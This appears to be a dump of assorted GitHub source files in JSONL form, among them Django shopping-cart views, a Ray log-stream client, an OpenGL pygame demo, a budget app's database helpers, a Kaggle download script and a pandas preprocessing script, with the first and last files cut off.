len(toppings) > 0:\r\n for topping in toppings:\r\n cart_item.topping.add(topping)\r\n cart_item.save()\r\n cart.total += cart_item.price\r\n cart.save()\r\n messages.success(request, 'pedido registrado')\r\n return HttpResponseRedirect(reverse('products'))\r\n\r\ndef removeItem_view(request, cart_item_id):\r\n cart_item = Cart_Item.objects.get(pk=cart_item_id)\r\n cart = Cart.objects.get(user=request.user)\r\n cart.total -= cart_item.price\r\n cart_item.delete()\r\n cart.save()\r\n messages.success(request, 'removido!')\r\n return HttpResponseRedirect(reverse('cart'))\r\n\r\ndef emptyCart_view(request):\r\n cart = Cart.objects.get(user=request.user)\r\n cart.total = 0\r\n cart.save()\r\n cart_items = Cart_Item.objects.filter(cart=cart)\r\n if cart_items:\r\n for cart_item in cart_items:\r\n cart_item.delete()\r\n messages.success(request, 'Limpió su carrito')\r\n return HttpResponseRedirect(reverse('cart'))\r\n\r\ndef cart_view(request):\r\n cart = Cart.objects.get(user=request.user)\r\n cart_items = Cart_Item.objects.filter(cart=cart)\r\n if not cart_items:\r\n return render(request, 'cart.html', {'empty': True})\r\n return render(request, 'cart.html', {'empty': False, 'cart_items': cart_items, 'cart':cart})\r\n\r\ndef order_view(request):\r\n cart = Cart.objects.get(user=request.user)\r\n cart_items = Cart_Item.objects.filter(cart=cart)\r\n\r\n #create a new empty order\r\n order = Order(user=request.user, total=cart.total)\r\n order.save()\r\n\r\n for cart_item in cart_items:\r\n order_item = Order_Item(order=order, item_detail=cart_item.item_detail, size=cart_item.size, price=cart_item.price)\r\n order_item.save()\r\n order_item.topping.set(cart_item.topping.all())\r\n order_item.save()\r\n messages.success(request, 'colocado con éxito')\r\n emptyCart_view(request)\r\n return HttpResponseRedirect(reverse('products'))\r\n\r\ndef orders_view(request):\r\n orders = Order.objects.filter(user=request.user)\r\n if not orders:\r\n return render(request, 'orders.html', {'empty': True})\r\n dic = dict()\r\n for order in orders:\r\n order_items = Order_Item.objects.filter(order=order)\r\n dic.update({order: order_items})\r\n\r\n return render(request, 'orders.html', {'empty': False, 'dic': dic})\r\n\r\ndef viewOrders_view(request):\r\n if request.method == 'POST':\r\n pass\r\n else:\r\n if request.user.is_staff:\r\n orders = Order.objects.exclude(status='Completada')\r\n if not orders:\r\n return render(request, 'vieworders.html', {'empty': True})\r\n dic = dict()\r\n for order in orders:\r\n order_items = Order_Item.objects.filter(order=order)\r\n dic.update({order: order_items})\r\n\r\n return render(request, 'vieworders.html', {'empty': False, 'dic': dic})\r\n\r\ndef markComplete_view(request, order_item_id):\r\n order = Order.objects.get(pk=order_item_id)\r\n order.status = 'Completada'\r\n order.save()\r\n messages.add_message(request, messages.SUCCESS, f'Orden marcada #{order.pk} como completada')\r\n return HttpResponseRedirect(reverse('vieworders'))\r\n\r\n\r\n\r\n","repo_name":"snaybanban/comercial","sub_path":"APPS/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24224676190","text":"# Monolithic launch\nimport subprocess\nfrom config import flask_bin\nimport os\nimport stat\nimport socket, errno\n\n\ndef initialize_flask_buddy():\n global env_command_dir\n current_directory = os.getcwd()\n env_command_dir = os.path.join(current_directory, r'buds')\n if not os.path.exists(env_command_dir):\n os.makedirs(env_command_dir)\n\n\ndef check_flask_port():\n global port\n for port in range(5000, 6000):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.bind((\"127.0.0.1\", port))\n print(\"Connected : {}\".format(port))\n break\n except socket.error as e:\n if e.errno == errno.EADDRINUSE:\n print(\"{}\".format(port), \" in use.\")\n else:\n # something else raised the socket.error exception\n print(e)\n\n s.close()\n\n\ndef get_project():\n global user_input_name\n while True:\n user_input_name = input(\"Key: \")\n if user_input_name in flask_bin:\n print(flask_bin[user_input_name])\n check_flask_port()\n venv_instance()\n if user_input_name not in flask_bin:\n print (\"Flask app not found.\")\n continue\n break\n\n\ndef venv_instance():\n print(\"Generating command file...\")\n env_file = user_input_name + '.command'\n buddy_loc = os.getcwd()\n env_file_loc = buddy_loc + \"/buds/\"\n try:\n env = open(env_file_loc + env_file, 'w+')\n except IOError:\n env = open(env_file_loc + env_file, 'w+')\n if os.path.exists(env_file_loc + user_input_name + '.command'):\n env.write(\"cd \" '{}\\n'.format(flask_bin[user_input_name]) + \"\\nsource venv/bin/activate\\n\" \"\\nflask run --port \" '{}\\n'.format(port))\n st = os.stat(env_file_loc + user_input_name + '.command')\n os.chmod(env_file_loc + user_input_name + '.command', st.st_mode | stat.S_IEXEC)\n print(\"Written with perms.\")\n else:\n print(\"Error writing env file.\")\n try:\n print(\"Opening term window...\")\n subprocess.call(['open', env.name])\n print(\"Term Window Opened.\")\n except Exception as E:\n print(\"FAIL: {0}\".format(E))\n\n\nif __name__ == '__main__':\n get_project()\n","repo_name":"jakedent/fluddy","sub_path":"tests/test003.py","file_name":"test003.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"86"} +{"seq_id":"29834617450","text":"# Dynamic Array Theory\n\n\"\"\"A dynamic array is an array with a big improvement: automatic resizing.\n One limitation of arrays is that they're fixed size,\n meaning you need to specify the number of elements\n your array will hold ahead of time.\n A dynamic array expands as you add more elements\"\"\"\n\n# NO need to specify array size beforehand\n# That extra space eventually runs out if keep adding elements\n\nimport sys\n#set n\nn = 10\n# set empty list\ndata = []\nfor i in range(n):\n\n# number of elements\n a = len(data)\n#actual size of bytes\n b = sys.getsizeof(data)\n print(f' *** Length: {a} & Size of bytes: {b} ***')\n#Increase length by one so\n data.append(n)\n\n\n# Theoretical Implementation\n# 1. Given array A\n# 2. Create array B with higher capacity (common rule is to double capacity of existing array)\n# 3. Store elements of A in B (set references)\n# 4. Reassign reference A to new array (B became A now)\n\n\"\"\" \"\"\"\n\n","repo_name":"ane4katv/STUDY","sub_path":"Basic Algorithms/Arrays/2. Dynamic Array Theory.py","file_name":"2. Dynamic Array Theory.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6595099455","text":"# Find the lowest common ancestor in an unordered binary tree given two values in the tree.\n\n# Lowest common ancestor : the lowest common ancestor (LCA) of two nodes v and w in a tree or directed acyclic graph (DAG) is the lowest \n# (i.e. deepest) node that has both v and w as descendants. \n# Example :\n\n\n# _______3______\n# / \\\n# ___5__ ___1__\n# / \\ / \\\n# 6 _2_ 0 8\n# / \\\n# 7 4\n# For the above tree, the LCA of nodes 5 and 1 is 3.\n\n# LCA = Lowest common ancestor \n\n# Please note that LCA for nodes 5 and 4 is 5.\n\n# You are given 2 values. Find the lowest common ancestor of the two nodes represented by val1 and val2\n# No guarantee that val1 and val2 exist in the tree. If one value doesn’t exist in the tree then return -1.\n# There are no duplicate values.\n# You can use extra memory, helper functions, and can modify the node struct but, you can’t add a parent pointer.\n\n##########################################################################################################################################\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\ndef find_num(A, B, C, l_b, l_c):\n if not l_b or B != l_b[-1]:\n l_b.append(A)\n if not l_c or C != l_c[-1]:\n l_c.append(A)\n \n if A.left:\n l_b, l_c = find_num(A.left, B, C, l_b, l_c)\n if B != l_b[-1]:\n l_b.pop()\n if C != l_c[-1]:\n l_c.pop()\n if A.right:\n l_b, l_c = find_num(A.right, B, C, l_b, l_c)\n if B != l_b[-1]:\n l_b.pop()\n if C != l_c[-1]:\n l_c.pop()\n \n return l_b, l_c\n \n \n\nclass Solution:\n # @param A : root node of tree\n # @param B : integer\n # @param C : integer\n # @return an integer\n def lca(self, A, B, C):\n if A is None:\n return -1\n \n l_b, l_c = find_num(A, B, C, [], [])\n if len(l_b) == 1 and l_b[0] != B:\n return -1\n if len(l_c) == 1 and l_c[0] != C:\n return -1\n \n while len(l_b) != len(l_c):\n if len(l_b) > len(l_c):\n l_b.pop()\n else:\n l_c.pop()\n \n while l_b:\n if l_b[-1] == l_c[-1]:\n return l_b[-1]\n \n l_b.pop()\n l_c.pop()\n \n##########################################################################################################################################\n","repo_name":"EladAssia/InterviewBit","sub_path":"Tree Data Structure/Least_Common_Ancestor.py","file_name":"Least_Common_Ancestor.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23568555604","text":"\"\"\"This file implements a threaded stream controller to return logs back from\nthe ray clientserver.\n\"\"\"\nimport sys\nimport logging\nimport queue\nimport threading\nimport time\nimport grpc\n\nfrom typing import TYPE_CHECKING\n\nimport ray.core.generated.ray_client_pb2 as ray_client_pb2\nimport ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc\n\nfrom ray.util.debug import log_once\n\nif TYPE_CHECKING:\n from ray.util.client.worker import Worker\n\nlogger = logging.getLogger(__name__)\n# TODO(barakmich): Running a logger in a logger causes loopback.\n# The client logger need its own root -- possibly this one.\n# For the moment, let's just not propogate beyond this point.\nlogger.propagate = False\n\n\nclass LogstreamClient:\n def __init__(self, client_worker: \"Worker\", metadata: list):\n \"\"\"Initializes a thread-safe log stream over a Ray Client gRPC channel.\n\n Args:\n client_worker: The Ray Client worker that manages this client\n metadata: metadata to pass to gRPC requests\n \"\"\"\n self.client_worker = client_worker\n self._metadata = metadata\n self.request_queue = queue.Queue()\n self.log_thread = self._start_logthread()\n self.log_thread.start()\n self.last_req = None\n\n def _start_logthread(self) -> threading.Thread:\n return threading.Thread(target=self._log_main, args=(), daemon=True)\n\n def _log_main(self) -> None:\n reconnecting = False\n while not self.client_worker._in_shutdown:\n if reconnecting:\n # Refresh queue and retry last request\n self.request_queue = queue.Queue()\n if self.last_req:\n self.request_queue.put(self.last_req)\n stub = ray_client_pb2_grpc.RayletLogStreamerStub(self.client_worker.channel)\n try:\n log_stream = stub.Logstream(\n iter(self.request_queue.get, None), metadata=self._metadata\n )\n except ValueError:\n # Trying to use the stub on a cancelled channel will raise\n # ValueError. This should only happen when the data client\n # is attempting to reset the connection -- sleep and try\n # again.\n time.sleep(0.5)\n continue\n try:\n for record in log_stream:\n if record.level < 0:\n self.stdstream(level=record.level, msg=record.msg)\n self.log(level=record.level, msg=record.msg)\n return\n except grpc.RpcError as e:\n reconnecting = self._process_rpc_error(e)\n if not reconnecting:\n return\n\n def _process_rpc_error(self, e: grpc.RpcError) -> bool:\n \"\"\"\n Processes RPC errors that occur while reading from data stream.\n Returns True if the error can be recovered from, False otherwise.\n \"\"\"\n if self.client_worker._can_reconnect(e):\n if log_once(\"lost_reconnect_logs\"):\n logger.warning(\n \"Log channel is reconnecting. Logs produced while \"\n \"the connection was down can be found on the head \"\n \"node of the cluster in \"\n \"`ray_client_server_[port].out`\"\n )\n logger.debug(\"Log channel dropped, retrying.\")\n time.sleep(0.5)\n return True\n logger.debug(\"Shutting down log channel.\")\n if not self.client_worker._in_shutdown:\n logger.exception(\"Unexpected exception:\")\n return False\n\n def log(self, level: int, msg: str):\n \"\"\"Log the message from the log stream.\n By default, calls logger.log but this can be overridden.\n\n Args:\n level: The loglevel of the received log message\n msg: The content of the message\n \"\"\"\n logger.log(level=level, msg=msg)\n\n def stdstream(self, level: int, msg: str):\n \"\"\"Log the stdout/stderr entry from the log stream.\n By default, calls print but this can be overridden.\n\n Args:\n level: The loglevel of the received log message\n msg: The content of the message\n \"\"\"\n print_file = sys.stderr if level == -2 else sys.stdout\n print(msg, file=print_file, end=\"\")\n\n def set_logstream_level(self, level: int):\n logger.setLevel(level)\n req = ray_client_pb2.LogSettingsRequest()\n req.enabled = True\n req.loglevel = level\n self.request_queue.put(req)\n self.last_req = req\n\n def close(self) -> None:\n self.request_queue.put(None)\n if self.log_thread is not None:\n self.log_thread.join()\n\n def disable_logs(self) -> None:\n req = ray_client_pb2.LogSettingsRequest()\n req.enabled = False\n self.request_queue.put(req)\n self.last_req = req\n","repo_name":"ray-project/ray","sub_path":"python/ray/util/client/logsclient.py","file_name":"logsclient.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":28715,"dataset":"github-code","pt":"86"} +{"seq_id":"74148999003","text":"class lang_de:\n devices = \"Geräte\"\n gamemodes = \"Spielmodi\"\n link = \"LoeweTag Link\"\n settings = \"Einstellungen\"\n quit = \"Beenden?\"\n quitmessage = \"Möchtest du das Prgoramm wircklich beenden?\"\n software_name = \"LoeweTag PC Software\"\n node_id = \"Node ID\"\n device_type = \"Gerät Typ\"\n firmware = \"Firmware\"\n refresh = \"Aktualisieren\"\n no_devices = \"Keine geräte\"\n repeater = \"Verstärker\"\n gun = \"Pistole\"\n unknown = \"Unbekannt\"\n language = \"Sprache\"\n connect = \"Verbinden\"\n disconnect = \"Trennen\"\n control = \"Steuerung\"\n find = \"Suchen\"\n settings_info = \"Das Programm muss neu gestartet werden, damit die Einstellungen angewendet werden.\"\n developer = \"Entwickler\"\n variables = \"Variablen\"\n colors = \"Farben\"\n color = \"Farbe\"\n gamestate = \"Spielstatus\"\n red = \"Rot\"\n green = \"Grün\"\n blue = \"Blau\"\n broadcast = \"Broadcast\"\n send_to_address = \"Senden zu Adresse:\"\n send = \"Senden\"\n design = \"Design\"","repo_name":"Loewe111/LoeweTag-Client-Deprecated","sub_path":"locales/language_de.py","file_name":"language_de.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72983109723","text":"\"\"\"\"\nTD\nAlgebre lineaire\nle vecteur\nla combinaison et la concatenation\n\"\"\"\nimport numpy as np\n\na = np.array([1,2,3,4])\n\nb = np.array([-1,3,4,6])\n\nz = np.concatenate([a,b])\n\nx_a = np.array([1,0,0,0,0])\nx_e = np.array([0,1,0,0,0])\nx_i = np.array([0,0,1,0,0])\nx_u = np.array([0,0,0,1,0])\nx_o = np.array([0,0,0,0,1])\nvoyelle = np.eye(5)\n\n\"\"\"\"ou \nnp.eye()\npour creer un array diagonale de 2D\n\"\"\"\noui_com = x_o+ x_u+ x_i\n#print(oui_com) [0 0 1 1 1]\noui = np.concatenate([x_o,x_u,x_i])\n#print(oui) [0 0 0 0 1 0 0 0 1 0 0 0 1 0 0]\n\n\"\"\"la difference le premier est la combinaison linéaire des trois vecteurs, le résultat reste la même taille \nmais concatenation crée un vecteur qui a une taille plus grande\"\"\"\ntext = open(\"text.txt\", \"r\")\nx = \"la souris mange le fromage et le trouve bon\"\nl_w = x.split()\ndef text_dict(text):\n set_word = set(text)\n word_list = list(set_word)\n word_idx = {tokens : idx for (idx, tokens) in enumerate(word_list)}\n return word_idx\n\ndicto = text_dict(l_w)\n\nprint(text_dict(l_w))\ndef text_vect(dicto, l_w):\n t = np.zeros(len(l_w))\n x = np.eye(len(l_w))\n for tok in l_w:\n idx = dicto[tok]\n t = t+x[idx]\n return t\n\nprint(text_vect(dicto,l_w))\n\n\n\n\n\n\n\n\n","repo_name":"CoCorooxin/linearAlgebra","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30904804360","text":"import pygame as pg\nimport numpy as np\n\nfrom OpenGL.GL import *\nimport glm\n\nfrom renderer import Renderer\nfrom shader import ShaderProgram\nfrom shapes import *\nfrom utils import *\n\npg.init()\n\nxsize = 1200\nysize = 900\n\npg.display.set_mode((xsize, ysize), pg.OPENGL|pg.DOUBLEBUF)\npg.display.set_caption(\"Lab1\")\npg.display.gl_set_attribute(pg.GL_MULTISAMPLESAMPLES, 16)\n\nglClearColor(0, 0, 0, 1)\nglEnable(GL_DEPTH_TEST)\nglDepthFunc(GL_LESS)\nglPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\nglEnable(GL_MULTISAMPLE)\n\nshader = ShaderProgram(\"shaders/default.vert\", \"shaders/default.frag\")\nshader.install()\n\nmodel_matrix = glm.mat4(1)\nview_matrix = glm.lookAt((0, 2, 3), (0, 0, 0), (0, 1, 0))\nproj_matrix = glm.perspective(glm.radians(45), xsize / ysize, 0.01, 100)\n\nset_matrix(shader, \"model\", model_matrix)\nset_matrix(shader, \"view\", view_matrix)\nset_matrix(shader, \"proj\", proj_matrix)\n\nclock = pg.time.Clock()\n\ncylinder = Renderer(Cylinder())\ncone = Renderer(Cone())\n\nrunning = True\nanimation = False\nbutton_down = False\n\ni = 0\nj = 0\n\nwhile running:\n #refresh screen\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n running = False\n\n if event.type == pg.KEYDOWN:\n if pg.key.get_pressed()[pg.K_a]:\n animation = True\n if pg.key.get_pressed()[pg.K_b]:\n animation = False\n\n if event.type == pg.MOUSEMOTION:\n\n if event.type == pg.MOUSEMOTION:\n if button_down:\n model_matrix *= glm.rotate(glm.radians(event.rel[1] / 10), (1, 0, 0))\n model_matrix *= glm.rotate(glm.radians(event.rel[0] / 10), (0, 1, 0))\n set_matrix(shader, \"model\", model_matrix)\n\n for event in pg.mouse.get_pressed():\n button_down = pg.mouse.get_pressed()[0]\n\n if animation:\n i = min(100, i + 0.5)\n j = min(90, i + 0.5)\n else:\n i = max(0, i - 0.5)\n j = max(0, j - 0.5)\n\n glLineWidth(2)\n set_vector(shader, \"color\", glm.vec4(1, 0, 0, 1))\n cylinder_matrix = glm.translate((0, 1, 0))\n cyl_rot_matrix = glm.rotate(glm.radians(j), (1, 0, 0))\n set_matrix(shader, \"model\", model_matrix * cylinder_matrix * cyl_rot_matrix)\n cylinder.display()\n set_matrix(shader, \"model\", model_matrix)\n\n set_vector(shader, \"color\", glm.vec4(0, 1, 0, 1))\n cone_matrix = glm.rotate(glm.radians(i), (0, 0, 1))\n set_matrix(shader, \"model\", model_matrix * cone_matrix)\n cone.display()\n set_matrix(shader, \"model\", model_matrix)\n\n # glLineWidth(2)\n # set_vector(shader, \"color\", glm.vec4(0, 1, 0, 1))\n # cube_matrix = glm.translate((i, 0, 0))\n # set_matrix(shader, \"model\", model_matrix * cube_matrix)\n # cube.display()\n # set_matrix(shader, \"model\", model_matrix)\n\n # sphere_matrix = glm.translate((0.5, 0, 0))\n # set_matrix(shader, \"model\", model_matrix * sphere_matrix)\n # set_vector(shader, \"color\", glm.vec4(1, 0, 0, 1))\n # sphere.display()\n # set_matrix(shader, \"model\", model_matrix)\n\n # set_vector(shader, \"color\", glm.vec4(0, 0, 1, 1))\n # cube2_matrix = glm.translate((-0.5, 0, 0))\n # set_matrix(shader, \"model\", model_matrix * cube2_matrix)\n # cube2.display()\n # set_matrix(shader, \"model\", model_matrix)\n\n pg.display.flip()\n clock.tick(60)\n\npg.quit()","repo_name":"MikhailFerapontow/graphic","sub_path":"lab1/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12692350407","text":"from flask import Flask,render_template,url_for,request\nimport pandas as pd \nimport pickle\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n#from sklearn.externals import joblib\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n\treturn render_template('home.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n print('hello')\n sms_classify('naura')\n\n\ndef sms_classify(message):\n '''\n Takes in as input a new sms (w1, w2, ..., wn),\n calculates P(Spam|w1, w2, ..., wn) and P(Ham|w1, w2, ..., wn),\n compares them and outcomes whether the message is spam or not.\n '''\n \n # Replace addresses (hhtp, email), numbers (plain, phone), money symbols\n message = message.replace(r'\\b[\\w\\-.]+?@\\w+?\\.\\w{2,4}\\b', ' ')\n message = message.replace(r'(http[s]?\\S+)|(\\w+\\.[A-Za-z]{2,4}\\S*)', ' ')\n message = message.replace(r'£|\\$', ' ') \n message = message.replace(r'\\b(\\+\\d{1,2}\\s)?\\d?[\\-(.]?\\d{3}\\)?[\\s.-]?\\d{3}[\\s.-]?\\d{4}\\b', ' ') \n message = message.replace(r'\\d+(\\.\\d+)?', ' ')\n\n # Remove punctuation, collapse all whitespace (spaces, line breaks, tabs) into a single space & eliminate any leading/trailing whitespace.\n message = message.replace(r'[^\\w\\d\\s]', ' ')\n message = message.replace(r'\\s+', ' ')\n message = message.replace(r'^\\s+|\\s+?$', '')\n message = message.replace(r'_[\\w\\d\\s]', ' ')\n\n # Lowercase the entire corpus\n message = message.lower()\n\n # Remove stop words \n from nltk.corpus import stopwords\n stop_words = set(stopwords.words('english'))\n \n terms = []\n for term in message.split():\n if term not in set(stop_words):\n terms.append(term)\n message = ' '.join(terms)\n\n # Lemmatization\n import nltk\n lemmatizer = nltk.stem.WordNetLemmatizer()\n \n message = ' '.join(lemmatizer.lemmatize(term, pos='v') for term in message.split()) \n \n # Stemming\n ss = nltk.SnowballStemmer(\"english\")\n \n message = ' '.join(ss.stem(term) for term in message.split()) \n \n # Tokenization\n from nltk.tokenize import word_tokenize\n \n message = message.split()\n \n\n \n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n \n","repo_name":"bartlomiej-wlodarski/spam_detector","sub_path":".ipynb_checkpoints/app-checkpoint.py","file_name":"app-checkpoint.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70668077085","text":"def fact(num): # Returns the sum of factorial of digits.\n if num > 1:\n factorial = num*fact(num-1)\n elif num == 1 or num == 0:\n return 1\n return factorial\n\ndef FactSumDigits(n):\n mylist = []\n y = str(n)\n for i in y:\n mylist.append(i)\n sumup = 0\n for digit in mylist:\n sumup += fact(int(digit))\n return sumup\n\n\nx = FactSumDigits(21)\nprint(x)\n","repo_name":"Algomaster0628/FactSumDigits","sub_path":"FactDigitSum.py","file_name":"FactDigitSum.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37309533012","text":"from database import get_db, close_db\n\n\ndef getItemsByDay(user_id, day):\n \"\"\"\n Returnes item depending on a day and user\n \"\"\"\n\n db = get_db()\n query = \"\"\"\n SELECT summary.id, item.item, item.price, category.category\n FROM item \n INNER JOIN summary\n ON item.id = summary.item_id\n INNER JOIN category\n ON summary.category_id = category.id \n INNER JOIN user \n ON summary.user_id = user.id \n WHERE summary.date = ? \n AND user.id = ?\n \"\"\"\n response = db.execute(query, (str(day), str(user_id), )).fetchall()\n return response\n\n\ndef populateCategories(user_id):\n \"\"\"\n Populates categories from database by user id\n \"\"\"\n\n db = get_db()\n query = \"\"\"\n SELECT category.category\n FROM category\n INNER JOIN user\n ON user.id = category.user_id\n WHERE user.id = ?\n \"\"\"\n categories = db.execute(query, (str(user_id),)).fetchall()\n select = []\n for category in categories:\n select.append(category[\"category\"])\n return select\n\n\ndef checkIfItemExists(item, price, description, user_id):\n \"\"\"\n Cheks if item exists before adding to reduce redudance. DEPRECATED\n \"\"\"\n\n db = get_db()\n query = \"\"\"\n SELECT item.item \n FROM item\n INNER JOIN summary\n ON item.id = summary.item_id\n INNER JOIN user\n ON user.id = summary.user_id\n WHERE item.item = ?\n AND item.price = ?\n AND item.description = ?\n AND user.id = ?\n \"\"\"\n response = db.execute(query, (str(item), str(\n price), str(description), str(user_id), )).fetchall()\n if response:\n return True\n else:\n return False\n\n\ndef addItem(item, price, description, user_id, date, category):\n \"\"\"\n Adds an item into the item table\n \"\"\"\n\n # if not checkIfItemExists(item, price, description, user_id):\n db = get_db()\n query = \"\"\"\n INSERT INTO item (item, price, description) VALUES (?, ?, ?);\n \"\"\"\n db.execute(query, (str(item), str(price), str(description)))\n db.commit()\n addToSummary(user_id, category, date)\n\n\ndef addToSummary(user_id, category, date):\n \"\"\"\n Checks if it is possible to add to summary and if it is, adds it\n \"\"\"\n\n db = get_db()\n query = \"\"\"\n SELECT id FROM item ORDER BY id DESC LIMIT 1; \n \"\"\"\n item_id = db.execute(query).fetchone()[\"id\"]\n\n query = \"\"\"\n SELECT id FROM category WHERE category = ? AND user_id = ?\n \"\"\"\n\n response = db.execute(query, (str(category), str(user_id))).fetchone()\n category_id = response[\"id\"]\n\n query = \"\"\"\n INSERT INTO summary (user_id, item_id, category_id, date) VALUES (?, ?, ?, ?);\n \"\"\"\n db.execute(query, (str(user_id), str(item_id),\n str(category_id), str(date),))\n db.commit()\n\n\ndef deleteItemFromDB(id):\n \"\"\" \n Deletes item by its id\n \"\"\"\n\n db = get_db()\n query = \"\"\"\n DELETE FROM summary \n WHERE id = ?\n \"\"\"\n db.execute(query, (str(id), ))\n db.commit()\n","repo_name":"BenTheShork/FinanceMe","sub_path":"dayDetails.py","file_name":"dayDetails.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2322561749","text":"\"\"\"\nThis script downloads the spotify 1 million dataset from\nKaggle (https://www.kaggle.com/datasets/notshrirang/spotify-million-song-dataset)\nand unzips it to the subfolder 'data' on the top level.\nThe script leverages the Kaggle SDK for authenticating with the Kaggle API and downloading the dataset.\nMake sure that the 'kaggle.json' file with the Kaggle API credentials is properly set up in the system.\nYou can follow the instructions at https://www.kaggle.com/docs/api.\n\nThe main function `load_via_kaggle` performs the authentication and download steps.\n\nThis script can be run directly, and upon execution, it will download and unzip the specified dataset to the\ndestination path.\n\nDependencies:\n - Kaggle SDK\n - os module\n\nUsage:\n python load_data.py\n\n\"\"\"\nimport os\nfrom kaggle import KaggleApi\n\nscript_folder = os.path.dirname(os.path.abspath(__file__))\ndestination_path = os.path.join(script_folder, \"data\")\ndataset_name = 'amitanshjoshi/spotify-1million-tracks'\n\n\ndef load_via_kaggle():\n # Authenticating with the Kaggle API\n api = KaggleApi()\n api.authenticate()\n\n # Downloading the dataset\n api.dataset_download_files(dataset_name, path=destination_path, unzip=True)\n\n\nif __name__ == \"__main__\":\n load_via_kaggle()\n","repo_name":"aai-institute/beyond-jupyter-spotify-popularity","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"43102133170","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 20 20:59:18 2019\n\n@author: Sadanand Vishwas\n\"\"\"\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndata = pd.read_csv('data/data.csv')\ndata.drop(['Unnamed: 0'], axis=1, inplace=True)\n# 'match_id', 'team_id'\ndata.describe()\ndata.apply(lambda x:sum(x.isnull()))\ndata.apply(lambda x:len(x.unique()))\ndata['shot_id_number'] = data.index+1\n\ndata.fillna({'remaining_min':data['remaining_min'].mean(),\n 'power_of_shot':data['power_of_shot'].mean(),\n 'remaining_sec':data['remaining_sec'].mean(),\n 'distance_of_shot':data['distance_of_shot'].mean(),\n 'location_x':data['location_x'].mean(),\n 'location_y':data['location_y'].mean(),\n 'remaining_min.1':data['remaining_min.1'].mean(),\n 'power_of_shot.1':data['power_of_shot.1'].mean(),\n 'remaining_sec.1':data['remaining_sec.1'].mean(),\n 'distance_of_shot.1':data['distance_of_shot.1'].mean(),\n 'knockout_match.1':data['knockout_match.1'].mean()},inplace=True)\n\nvars=['knockout_match','area_of_shot','shot_basics', 'range_of_shot', 'team_name',\n 'date_of_game', 'home/away', 'type_of_shot', 'type_of_combined_shot',\n 'lat/lng', 'game_season']\n\nfor var in vars:\n data[var].fillna(method='ffill', inplace=True)\n \ndata['type_of_combined_shot'].fillna(method='bfill', inplace=True)\n\ndata['home_or_away'] = data['home/away'].apply(lambda x:\n 'AWA' if x[5:6] == '@' else 'HOM')\n \ndata['time_min.1'] = data['remaining_min.1'] + data['remaining_sec.1'].apply(lambda x:\n x if x==0 else x/60)\n \ntimes = [i for i in range(2, 131, 2)]\nstart_time = [i for i in range(0, 129, 2)]\ndef imputeTime(cols):\n time = cols[0]\n for i,time_i in enumerate(times):\n if float(time)<=float(time_i):\n return str(start_time[i])+'-'+str(time_i)\n\n\ndata['remaining_time'] = data[['time_min.1']].apply(imputeTime, axis=1).astype(str)\n\ndata.drop(['time_min.1','location_y', 'shot_basics', 'lat/lng','power_of_shot.1','distance_of_shot.1',\n 'knockout_match.1','distance_of_shot.1', 'range_of_shot', 'type_of_shot',\n 'match_event_id', 'team_name', 'team_id', 'match_id', 'date_of_game',\n 'home/away', 'remaining_min', 'remaining_min.1', 'remaining_sec',\n 'remaining_sec.1'],\n axis=1,inplace=True)\n\ndata.apply(lambda x:sum(x.isnull()))\ndata.apply(lambda x:len(x.unique()))\n\n# Create broad seasons of 4 years each\nseasons = ['2000','2004', '2008','2012','2016']\nstart_seasons = ['1996','2001','2005', '2009', '2013']\ndef imputSeason(cols):\n season=cols[0]\n for i,year in enumerate(seasons):\n if year>=season[:4]:\n return start_seasons[i]+'-'+year[-2:]\n\ndata['game_season_broad'] = data[['game_season']].apply(imputSeason, axis=1).astype(str)\ndata.drop(['game_season'],axis=1, inplace=True)\n\n# Label Encoding \nfrom sklearn.preprocessing import LabelEncoder\nle = LabelEncoder()\n\nvars = ['area_of_shot', 'home_or_away',\n 'type_of_combined_shot',\n 'game_season_broad', 'remaining_time']\n\nfor var in vars:\n data[var]=le.fit_transform(data[var])\n\n# Correalation table(matrix)\ncor = data.corr( method='pearson')\n\n# OneHotEncoding\ndata=pd.get_dummies(data, columns=vars)\n\n# Save modified 